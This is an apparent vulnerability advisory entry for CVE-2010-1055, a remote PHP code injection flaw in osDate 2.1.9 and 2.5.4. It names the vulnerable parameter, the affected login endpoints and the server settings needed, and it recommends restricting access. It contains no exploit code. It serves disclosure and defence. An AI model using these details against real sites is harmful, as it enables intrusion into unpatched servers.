PT-2010-2776 · Osdate · Osdate

Published

2010-03-23

Updated

2017-08-17

CVE-2010-1055

CVSS v2.0

5.1

Medium

Vector

AV:N/AC:H/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions osDate versions 2.1.9 through 2.1.9 osDate versions 2.5.4 through 2.5.4

Description The issue allows remote attackers to execute arbitrary PHP code when magic quotes gpc is disabled and register globals is enabled. This can be achieved via a URL in the config[forum installed] parameter to API endpoints such as "forum/adminLogin.php" and "forum/userLogin.php".

Recommendations For osDate version 2.1.9, consider disabling the config[forum installed] parameter or restricting access to the "forum/adminLogin.php" and "forum/userLogin.php" API endpoints until a patch is available. For osDate version 2.5.4, consider disabling the config[forum installed] parameter or restricting access to the "forum/adminLogin.php" and "forum/userLogin.php" API endpoints until a patch is available.

Exploit

Fix

Code Injection

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-94

Related Identifiers

CVE-2010-1055

Affected Products

Osdate

PT-2010-2776 · Osdate · Osdate

CVE-2010-1055

Weakness Enumeration

Related Identifiers

Affected Products

References · 9